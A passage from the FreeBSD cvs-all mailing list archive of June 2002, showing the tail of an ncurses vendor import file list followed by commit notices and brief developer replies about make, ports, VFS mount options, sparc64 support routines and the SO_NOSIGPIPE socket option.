src/contrib/ncurses/ncurses/base/lib_inchstr.c U src/contrib/ncurses/ncurses/base/lib_initscr.c U src/contrib/ncurses/ncurses/base/lib_insch.c U src/contrib/ncurses/ncurses/base/lib_insdel.c U src/contrib/ncurses/ncurses/base/lib_instr.c U src/contrib/ncurses/ncurses/base/lib_isendwin.c U src/contrib/ncurses/ncurses/base/lib_leaveok.c U src/contrib/ncurses/ncurses/base/lib_move.c U src/contrib/ncurses/ncurses/base/lib_mvwin.c U src/contrib/ncurses/ncurses/base/lib_overlay.c U src/contrib/ncurses/ncurses/base/lib_printw.c U src/contrib/ncurses/ncurses/base/lib_redrawln.c U src/contrib/ncurses/ncurses/base/lib_scanw.c U src/contrib/ncurses/ncurses/base/lib_screen.c U src/contrib/ncurses/ncurses/base/lib_box.c U src/contrib/ncurses/ncurses/base/lib_scrollok.c U src/contrib/ncurses/ncurses/base/tries.c U src/contrib/ncurses/ncurses/base/lib_slklab.c U src/contrib/ncurses/ncurses/base/lib_slkset.c U src/contrib/ncurses/ncurses/base/lib_touch.c U src/contrib/ncurses/ncurses/base/lib_slkatr_set.c U src/contrib/ncurses/ncurses/base/lib_vline.c U src/contrib/ncurses/ncurses/base/lib_addstr.c U src/contrib/ncurses/ncurses/base/lib_nl.c U src/contrib/ncurses/ncurses/base/lib_window.c U src/contrib/ncurses/ncurses/base/lib_slkatrof.c U src/contrib/ncurses/ncurses/base/lib_slkatron.c U src/contrib/ncurses/ncurses/base/lib_slkatrset.c U src/contrib/ncurses/ncurses/base/lib_slkattr.c U src/contrib/ncurses/ncurses/base/lib_slkclear.c U src/contrib/ncurses/ncurses/base/lib_slkcolor.c U src/contrib/ncurses/ncurses/base/lib_slkinit.c U src/contrib/ncurses/ncurses/base/lib_slkrefr.c U src/contrib/ncurses/ncurses/base/lib_slktouch.c U src/contrib/ncurses/ncurses/base/lib_ungetch.c U src/contrib/ncurses/ncurses/base/lib_wattroff.c U src/contrib/ncurses/ncurses/base/lib_wattron.c U src/contrib/ncurses/ncurses/base/memmove.c U src/contrib/ncurses/ncurses/base/nc_panel.c U src/contrib/ncurses/ncurses/base/resizeterm.c U src/contrib/ncurses/ncurses/base/sigaction.c U src/contrib/ncurses/ncurses/base/vsscanf.c U src/contrib/ncurses/ncurses/base/safe_sprintf.c U src/contrib/ncurses/ncurses/base/lib_beep.c U src/contrib/ncurses/ncurses/base/lib_flash.c U src/contrib/ncurses/ncurses/base/lib_slk.c U src/contrib/ncurses/ncurses/base/lib_freeall.c U src/contrib/ncurses/ncurses/base/version.c U src/contrib/ncurses/ncurses/base/lib_insstr.c U src/contrib/ncurses/ncurses/base/wresize.c U src/contrib/ncurses/ncurses/base/MKunctrl.awk U src/contrib/ncurses/ncurses/base/lib_newwin.c U src/contrib/ncurses/ncurses/base/lib_pad.c U src/contrib/ncurses/ncurses/base/lib_refresh.c U src/contrib/ncurses/ncurses/base/lib_addch.c U src/contrib/ncurses/ncurses/base/lib_hline.c U src/contrib/ncurses/ncurses/base/lib_dft_fgbg.c U src/contrib/ncurses/ncurses/base/lib_newterm.c U src/contrib/ncurses/ncurses/base/MKlib_gen.sh U src/contrib/ncurses/ncurses/base/lib_winch.c U src/contrib/ncurses/ncurses/base/lib_color.c U src/contrib/ncurses/ncurses/base/lib_restart.c U src/contrib/ncurses/ncurses/base/lib_set_term.c U src/contrib/ncurses/ncurses/base/lib_mouse.c U src/contrib/ncurses/ncurses/base/lib_getch.c U src/contrib/ncurses/ncurses/tinfo/MKcaptab.awk U src/contrib/ncurses/ncurses/tinfo/MKfallback.sh U src/contrib/ncurses/ncurses/tinfo/MKnames.awk U src/contrib/ncurses/ncurses/tinfo/README U src/contrib/ncurses/ncurses/tinfo/comp_expand.c U src/contrib/ncurses/ncurses/tinfo/comp_hash.c U src/contrib/ncurses/ncurses/tinfo/doalloc.c U src/contrib/ncurses/ncurses/tinfo/getenv_num.c U src/contrib/ncurses/ncurses/tinfo/access.c U src/contrib/ncurses/ncurses/tinfo/lib_acs.c U src/contrib/ncurses/ncurses/tinfo/lib_cur_term.c U src/contrib/ncurses/ncurses/tinfo/lib_data.c U src/contrib/ncurses/ncurses/tinfo/lib_has_cap.c U src/contrib/ncurses/ncurses/tinfo/lib_kernel.c U src/contrib/ncurses/ncurses/tinfo/lib_longname.c U src/contrib/ncurses/ncurses/tinfo/lib_print.c U src/contrib/ncurses/ncurses/tinfo/lib_termname.c U src/contrib/ncurses/ncurses/tinfo/name_match.c U src/contrib/ncurses/ncurses/tinfo/init_keytry.c U src/contrib/ncurses/ncurses/tinfo/lib_ttyflags.c U src/contrib/ncurses/ncurses/tinfo/comp_error.c U src/contrib/ncurses/ncurses/tinfo/lib_ti.c C src/contrib/ncurses/ncurses/tinfo/lib_termcap.c U src/contrib/ncurses/ncurses/tinfo/lib_setup.c U src/contrib/ncurses/ncurses/tinfo/make_keys.c U src/contrib/ncurses/ncurses/tinfo/alloc_entry.c U src/contrib/ncurses/ncurses/tinfo/add_tries.c U src/contrib/ncurses/ncurses/tinfo/captoinfo.c U src/contrib/ncurses/ncurses/tinfo/lib_napms.c U src/contrib/ncurses/ncurses/tinfo/setbuf.c U src/contrib/ncurses/ncurses/tinfo/free_ttype.c U src/contrib/ncurses/ncurses/tinfo/lib_raw.c U src/contrib/ncurses/ncurses/tinfo/alloc_ttype.c U src/contrib/ncurses/ncurses/tinfo/lib_options.c U src/contrib/ncurses/ncurses/tinfo/lib_tgoto.c U src/contrib/ncurses/ncurses/tinfo/comp_scan.c U src/contrib/ncurses/ncurses/tinfo/strings.c U src/contrib/ncurses/ncurses/tinfo/parse_entry.c U src/contrib/ncurses/ncurses/tinfo/comp_parse.c U src/contrib/ncurses/ncurses/tinfo/write_entry.c U src/contrib/ncurses/ncurses/tinfo/home_terminfo.c U src/contrib/ncurses/ncurses/tinfo/lib_tputs.c U src/contrib/ncurses/ncurses/tinfo/lib_baudrate.c U src/contrib/ncurses/ncurses/tinfo/read_entry.c U src/contrib/ncurses/ncurses/tinfo/lib_tparm.c U src/contrib/ncurses/ncurses/tinfo/read_termcap.c U src/contrib/ncurses/ncurses/tinfo/MKkeys_list.sh U src/contrib/ncurses/ncurses/trace/README U src/contrib/ncurses/ncurses/trace/lib_tracedmp.c U src/contrib/ncurses/ncurses/trace/lib_tracemse.c U src/contrib/ncurses/ncurses/trace/trace_buf.c U src/contrib/ncurses/ncurses/trace/trace_tries.c U src/contrib/ncurses/ncurses/trace/trace_xnames.c U src/contrib/ncurses/ncurses/trace/lib_trace.c U src/contrib/ncurses/ncurses/trace/lib_tracechr.c U src/contrib/ncurses/ncurses/trace/lib_traceatr.c U src/contrib/ncurses/ncurses/trace/lib_tracebits.c U src/contrib/ncurses/ncurses/trace/varargs.c U src/contrib/ncurses/ncurses/trace/visbuf.c U src/contrib/ncurses/ncurses/tty/hardscroll.c U src/contrib/ncurses/ncurses/tty/tty_input.h U src/contrib/ncurses/ncurses/tty/hashmap.c U src/contrib/ncurses/ncurses/tty/tty_display.h U src/contrib/ncurses/ncurses/tty/MKexpanded.sh U src/contrib/ncurses/ncurses/tty/lib_twait.c U src/contrib/ncurses/ncurses/tty/lib_tstp.c U src/contrib/ncurses/ncurses/tty/lib_mvcur.c U src/contrib/ncurses/ncurses/tty/tty_update.c U src/contrib/ncurses/ncurses/tty/lib_vidattr.c U src/contrib/ncurses/ncurses/widechar/lib_wunctrl.c U src/contrib/ncurses/ncurses/widechar/lib_vline_set.c U src/contrib/ncurses/ncurses/widechar/lib_wacs.c U src/contrib/ncurses/ncurses/widechar/lib_inwstr.c U src/contrib/ncurses/ncurses/widechar/lib_in_wch.c U src/contrib/ncurses/ncurses/widechar/lib_ins_wch.c U src/contrib/ncurses/ncurses/widechar/lib_ins_nwstr.c U src/contrib/ncurses/ncurses/widechar/lib_unget_wch.c U src/contrib/ncurses/ncurses/widechar/lib_get_wch.c U src/contrib/ncurses/ncurses/widechar/lib_hline_set.c U src/contrib/ncurses/ncurses/widechar/lib_box_set.c U src/contrib/ncurses/ncurses/widechar/lib_in_wchnstr.c U src/contrib/ncurses/ncurses/widechar/lib_get_wstr.c U src/contrib/ncurses/ncurses/widechar/lib_cchar.c U src/contrib/ncurses/ncurses/widechar/lib_erasewchar.c U src/contrib/ncurses/ncurses/widechar/lib_vid_attr.c U src/contrib/ncurses/panel/headers U src/contrib/ncurses/panel/modules U src/contrib/ncurses/panel/p_delete.c U src/contrib/ncurses/panel/p_hidden.c U src/contrib/ncurses/panel/p_move.c U src/contrib/ncurses/panel/p_new.c U src/contrib/ncurses/panel/p_replace.c U src/contrib/ncurses/panel/p_top.c U src/contrib/ncurses/panel/p_show.c U src/contrib/ncurses/panel/p_user.c U src/contrib/ncurses/panel/p_win.c U src/contrib/ncurses/panel/panel.c U src/contrib/ncurses/panel/panel.h U src/contrib/ncurses/panel/p_below.c U src/contrib/ncurses/panel/p_above.c U src/contrib/ncurses/panel/p_hide.c U src/contrib/ncurses/panel/p_bottom.c U src/contrib/ncurses/panel/p_update.c U src/contrib/ncurses/panel/llib-lpanel U src/contrib/ncurses/panel/panel.priv.h U src/contrib/ncurses/panel/Makefile.in U src/contrib/ncurses/progs/capconvert U src/contrib/ncurses/progs/clear.c U src/contrib/ncurses/progs/clear.sh U src/contrib/ncurses/progs/modules U src/contrib/ncurses/progs/MKtermsort.sh U src/contrib/ncurses/progs/dump_entry.h U src/contrib/ncurses/progs/toe.c U src/contrib/ncurses/progs/progs.priv.h U src/contrib/ncurses/progs/infocmp.c U src/contrib/ncurses/progs/dump_entry.c U src/contrib/ncurses/progs/tput.c U src/contrib/ncurses/progs/tset.c U src/contrib/ncurses/progs/Makefile.in U src/contrib/ncurses/progs/tic.c U src/contrib/ncurses/tack/COPYING U src/contrib/ncurses/tack/control.c U src/contrib/ncurses/tack/output.c U src/contrib/ncurses/tack/crum.c U src/contrib/ncurses/tack/HISTORY U src/contrib/ncurses/tack/modes.c U src/contrib/ncurses/tack/modules U src/contrib/ncurses/tack/fun.c U src/contrib/ncurses/tack/color.c U src/contrib/ncurses/tack/scan.c U src/contrib/ncurses/tack/sync.c U src/contrib/ncurses/tack/tack.1 U src/contrib/ncurses/tack/tack.c U src/contrib/ncurses/tack/tack.h U src/contrib/ncurses/tack/charset.c U src/contrib/ncurses/tack/pad.c U src/contrib/ncurses/tack/menu.c U src/contrib/ncurses/tack/README U src/contrib/ncurses/tack/edit.c U src/contrib/ncurses/tack/ansi.c U src/contrib/ncurses/tack/init.c U src/contrib/ncurses/tack/sysdep.c U src/contrib/ncurses/tack/Makefile.in U src/contrib/ncurses/test/README U src/contrib/ncurses/test/bs.6 U src/contrib/ncurses/test/bs.c U src/contrib/ncurses/test/cardfile.dat U src/contrib/ncurses/test/ditto.c U src/contrib/ncurses/test/firstlast.c U src/contrib/ncurses/test/gdc.6 U src/contrib/ncurses/test/hashtest.c U src/contrib/ncurses/test/keynames.c U src/contrib/ncurses/test/ncurses_tst.hin U src/contrib/ncurses/test/newdemo.c U src/contrib/ncurses/test/testaddch.c U src/contrib/ncurses/test/testscanw.c U src/contrib/ncurses/test/tracemunch U src/contrib/ncurses/test/configure U src/contrib/ncurses/test/lrtest.c U src/contrib/ncurses/test/firework.c U src/contrib/ncurses/test/tclock.c U src/contrib/ncurses/test/filter.c U src/contrib/ncurses/test/blue.c U src/contrib/ncurses/test/dots.c U src/contrib/ncurses/test/modules U src/contrib/ncurses/test/worm.c U src/contrib/ncurses/test/testcurs.c U src/contrib/ncurses/test/rain.c U src/contrib/ncurses/test/gdc.c U src/contrib/ncurses/test/view.c U src/contrib/ncurses/test/test.priv.h U src/contrib/ncurses/test/xmas.c U src/contrib/ncurses/test/hanoi.c U src/contrib/ncurses/test/cardfile.c U src/contrib/ncurses/test/ncurses.c U src/contrib/ncurses/test/Makefile.in U src/contrib/ncurses/test/railroad.c U src/contrib/ncurses/test/knight.c U src/contrib/ncurses/test/configure.in 1 conflicts created by this import. Use the following command to help the merge: cvs checkout -jNCURSES:yesterday -jNCURSES src/contrib/ncurses To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 12:46:16 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8C11D37B486; Thu, 20 Jun 2002 12:45:44 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KJji656951; Thu, 20 Jun 2002 12:45:44 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206201945.g5KJji656951@freefall.freebsd.org> From: Juli Mallett Date: Thu, 20 Jun 2002 12:45:44 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/make parse.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/20 12:45:44 PDT Modified files: usr.bin/make parse.c Log: More unsigned char casts to isupper(3). Obtained from: NetBSD Revision Changes Path 1.36 +2 -2 src/usr.bin/make/parse.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 12:51:18 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7B82037B408; Thu, 20 Jun 2002 12:51:13 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KJpDI57766; Thu, 20 Jun 2002 12:51:13 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206201951.g5KJpDI57766@freefall.freebsd.org> From: Juli Mallett Date: Thu, 20 Jun 2002 12:51:13 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/make parse.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/20 12:51:13 PDT Modified files: usr.bin/make parse.c Log: Fix a bug fixed by NetBSD in revision 1.42 of parse.c by christos which caused an example Makefile I was showing someone just last night to report a variable as being recursive. Obtained from: NetBSD Revision Changes Path 1.37 +8 -0 src/usr.bin/make/parse.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 12:53:46 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8674237B419; Thu, 20 Jun 2002 12:53:11 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KJrAS58216; Thu, 20 Jun 2002 12:53:10 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206201953.g5KJrAS58216@freefall.freebsd.org> From: Ying-Chieh Liao Date: Thu, 20 Jun 2002 12:53:10 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/lang/xsb Makefile distinfo pkg-plist ports/lang/xsb/files patch-aa patch-ab patch-ac patch-ad patch-ae patch-af patch-ag X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/20 12:53:10 PDT Modified files: lang/xsb Makefile distinfo pkg-plist lang/xsb/files patch-aa patch-ab patch-ac patch-ad patch-ae patch-af Added files: lang/xsb/files patch-ag Log: upgrade to 2.5 PR: 39474 Submitted by: maintainer Revision Changes Path 1.3 +13 -8 ports/lang/xsb/Makefile 1.2 +1 -1 ports/lang/xsb/distinfo 1.2 +11 -17 ports/lang/xsb/files/patch-aa 1.2 +11 -17 ports/lang/xsb/files/patch-ab 1.2 +2 -2 ports/lang/xsb/files/patch-ac 1.2 +18 -9 ports/lang/xsb/files/patch-ad 1.2 +2 -2 ports/lang/xsb/files/patch-ae 1.2 +21 -14 ports/lang/xsb/files/patch-af 1.1 +20 -0 ports/lang/xsb/files/patch-ag (new) 1.2 +345 -448 ports/lang/xsb/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 13: 2: 4 2002 Delivered-To: cvs-all@freebsd.org Received: from rwcrmhc53.attbi.com (rwcrmhc53.attbi.com [204.127.198.39]) by hub.freebsd.org (Postfix) with ESMTP id EF40337B4D3; Thu, 20 Jun 2002 13:00:15 -0700 (PDT) Received: from InterJet.elischer.org ([12.232.206.8]) by rwcrmhc53.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020620200015.SXQM11659.rwcrmhc53.attbi.com@InterJet.elischer.org>; Thu, 20 Jun 2002 20:00:15 +0000 Received: from localhost (localhost.elischer.org [127.0.0.1]) by InterJet.elischer.org (8.9.1a/8.9.1) with ESMTP id MAA32175; Thu, 20 Jun 2002 12:47:07 -0700 (PDT) Date: Thu, 20 Jun 2002 12:47:05 -0700 (PDT) From: Julian Elischer To: Peter Wemm Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/sys/alpha/alpha support.s src/sys/i386/i386 support.s src/sys/ia64/ia64 support.s src/sys/powerpc/powerpc copyinout.c src/sys/sys systm.h src/sys/sparc64/sparc64 support.s In-Reply-To: <200206200713.g5K7DaD15856@freefall.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG can you replace it with a suptr and fuptr (set user pointer and fettch user pointer)? I'd really like to have them... On Thu, 20 Jun 2002, Peter Wemm wrote: > peter 2002/06/20 00:13:35 PDT > > Modified files: > sys/alpha/alpha support.s > sys/i386/i386 support.s > sys/ia64/ia64 support.s > sys/powerpc/powerpc copyinout.c > sys/sys systm.h > sys/sparc64/sparc64 support.s > Log: > Deorbit suibyte(). It was only used for split address space systems > for supporting UIO_USERISPACE (ie: it wasn't used). > > Revision Changes Path > 1.11 +0 -5 src/sys/alpha/alpha/support.s > 1.90 +5 -6 src/sys/i386/i386/support.s > 1.14 +0 -5 src/sys/ia64/ia64/support.s > 1.6 +0 -7 src/sys/powerpc/powerpc/copyinout.c > 1.14 +0 -12 src/sys/sparc64/sparc64/support.s > 1.176 +0 -1 src/sys/sys/systm.h > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 13: 6:48 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 58AE237B65A; Thu, 20 Jun 2002 13:03:42 -0700 (PDT) Received: (from mux@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KK3g959620; Thu, 20 Jun 2002 13:03:42 -0700 (PDT) (envelope-from mux) Message-Id: <200206202003.g5KK3g959620@freefall.freebsd.org> From: Maxime Henrion Date: Thu, 20 Jun 2002 13:03:42 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/kern vfs_subr.c vfs_syscalls.c src/sys/sys mount.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG mux 2002/06/20 13:03:42 PDT Modified files: sys/kern vfs_subr.c vfs_syscalls.c sys/sys mount.h Log: Change the way we internally store the mount options to a linked list. This is to allow the merging of the mount options in the MNT_UPDATE case, as the current data structure is unsuitable for this. There are no functional differences in this commit. Reviewed by: phk Revision Changes Path 1.362 +45 -10 src/sys/kern/vfs_subr.c 1.259 +17 -59 src/sys/kern/vfs_syscalls.c 1.128 +4 -6 src/sys/sys/mount.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 13: 7:26 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 569CC37B665; Thu, 20 Jun 2002 13:04:32 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KK4W759715; Thu, 20 Jun 2002 13:04:32 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206202004.g5KK4W759715@freefall.freebsd.org> From: Ying-Chieh Liao Date: Thu, 20 Jun 2002 13:04:31 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/py-ncurses Makefile pkg-plist ports/devel/py-ncurses/files patch-setup.py X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/20 13:04:31 PDT Modified files: devel/py-ncurses Makefile pkg-plist Added files: devel/py-ncurses/files patch-setup.py Log: - Add missed .pyo files on pkg-plist - Add workaround for the problem when importing ncurses.panel earlier than ncurses.curses module - Chase the modern bsd.python.mk style. PR: 39448 Submitted by: Hye-Shik Chang Approved by: maintainer Revision Changes Path 1.3 +6 -4 ports/devel/py-ncurses/Makefile 1.1 +21 -0 ports/devel/py-ncurses/files/patch-setup.py (new) 1.2 +20 -15 ports/devel/py-ncurses/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 13: 9: 2 2002 Delivered-To: cvs-all@freebsd.org Received: from anchor-post-31.mail.demon.net (anchor-post-31.mail.demon.net [194.217.242.89]) by hub.freebsd.org (Postfix) with ESMTP id 357D737B40E; Thu, 20 Jun 2002 13:06:00 -0700 (PDT) Received: from mailgate.nlsystems.com ([62.49.251.130] helo=herring.nlsystems.com) by anchor-post-31.mail.demon.net with esmtp (Exim 3.35 #1) id 17L8Br-000Ll9-0V; Thu, 20 Jun 2002 21:05:59 +0100 Received: from herring.nlsystems.com (localhost [127.0.0.1]) by herring.nlsystems.com (8.12.3/8.11.2) with ESMTP id g5KK5waB036948; Thu, 20 Jun 2002 21:05:58 +0100 (BST) (envelope-from dfr@herring.nlsystems.com) Received: (from dfr@localhost) by herring.nlsystems.com (8.12.4/8.12.4/Submit) id g5KK5w5e036947; Thu, 20 Jun 2002 21:05:58 +0100 (BST) Content-Type: text/plain; charset="iso-8859-1" From: Doug Rabson To: Alfred Perlstein , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/sys/sys socket.h src/sys/kern sys_generic.c uipc_socket.c uipc_syscalls.c Date: Thu, 20 Jun 2002 21:05:58 +0100 User-Agent: KMail/1.4.1 References: <200206201852.g5KIqtR45478@freefall.freebsd.org> <20020620185711.GC74849@elvis.mu.org> In-Reply-To: <20020620185711.GC74849@elvis.mu.org> MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable Message-Id: <200206202105.58476.dfr@nlsystems.com> Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Thursday 20 June 2002 7:57 pm, Alfred Perlstein wrote: > * Alfred Perlstein [020620 11:53] wrote: > > alfred 2002/06/20 11:52:54 PDT > > > > Modified files: > > sys/sys socket.h > > sys/kern sys_generic.c uipc_socket.c > > uipc_syscalls.c > > Log: > > Implement SO_NOSIGPIPE option for sockets. This allows one to requ= est > > that an EPIPE error return not generate SIGPIPE on sockets. > > > > Submitted by: lioux > > Inspired by: Darwin > > Can I get some votes (in private mail please) for MFC'ing this feature? I doubt that voting is a useful procedure for this. This appears to simpl= y add=20 a new interface and not change any existing programs. As such, it should = just=20 get the usual settling-out time in current and be MFC'ed afterwards. I=20 suggest waiting a week for any adverse effects and then just do it. --=20 Doug Rabson=09=09=09=09Mail: dfr@nlsystems.com =09=09=09=09=09Phone: +44 20 8348 6160 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 13: 9:33 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id CBCFD37B70B; Thu, 20 Jun 2002 13:08:08 -0700 (PDT) Received: (from dwcjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KK88B64097; Thu, 20 Jun 2002 13:08:08 -0700 (PDT) (envelope-from dwcjr) Message-Id: <200206202008.g5KK88B64097@freefall.freebsd.org> From: "David W. Chapman Jr." Date: Thu, 20 Jun 2002 13:08:08 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/samba Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dwcjr 2002/06/20 13:08:08 PDT Modified files: net/samba Makefile Log: Fix building for VFS modules, prelease leftover config.cache and I had to delete it for it to detect us properly, that file doesn't exist anymore Revision Changes Path 1.92 +1 -1 ports/net/samba/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 13:18:13 2002 Delivered-To: cvs-all@freebsd.org Received: from squall.waterspout.com (squall.waterspout.com [208.13.56.12]) by hub.freebsd.org (Postfix) with ESMTP id E5CE637B410; Thu, 20 Jun 2002 13:18:08 -0700 (PDT) Received: by squall.waterspout.com (Postfix, from userid 1050) id 4CDAE9B13; Thu, 20 Jun 2002 15:18:08 -0500 (EST) Date: Thu, 20 Jun 2002 15:18:08 -0500 From: Will Andrews To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: ports/net/samba Makefile pkg-plist Message-ID: <20020620201808.GM76002@squall.waterspout.com> Mail-Followup-To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org References: <200206200218.g5K2IDZ58071@freefall.freebsd.org> <3D119542.994D9CCF@FreeBSD.org> <20020620084928.GB38331@starjuice.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020620084928.GB38331@starjuice.net> User-Agent: Mutt/1.3.26i Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Thu, Jun 20, 2002 at 10:49:28AM +0200, Sheldon Hearn wrote: > If you fix the PLIST, the resulting package will install a different set > of files. I thought this warranted a PORTREVISION bump. That's correct. Regards, -- wca To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 13:42: 5 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C672737B405; Thu, 20 Jun 2002 13:41:57 -0700 (PDT) Received: (from jake@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KKfvg68178; Thu, 20 Jun 2002 13:41:57 -0700 (PDT) (envelope-from jake) Message-Id: <200206202041.g5KKfvg68178@freefall.freebsd.org> From: Jake Burkholder Date: Thu, 20 Jun 2002 13:41:57 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/sparc64/sparc64 support.s X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jake 2002/06/20 13:41:57 PDT Modified files: sys/sparc64/sparc64 support.s Log: {f,s}usword -> {f,s}uword16. Implement {f,s}uword32. Requested by: peter Revision Changes Path 1.15 +47 -23 src/sys/sparc64/sparc64/support.s To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 13:54:30 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id F351C37B422; Thu, 20 Jun 2002 13:54:15 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KKsFa69413; Thu, 20 Jun 2002 13:54:15 -0700 (PDT) (envelope-from obrien) Message-Id: <200206202054.g5KKsFa69413@freefall.freebsd.org> From: "David E. O'Brien" Date: Thu, 20 Jun 2002 13:54:15 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/gnu/usr.bin/awk Makefile config.h src/gnu/usr.bin/awk/doc Makefile X-FreeBSD-CVS-Branch: HEAD Sender: 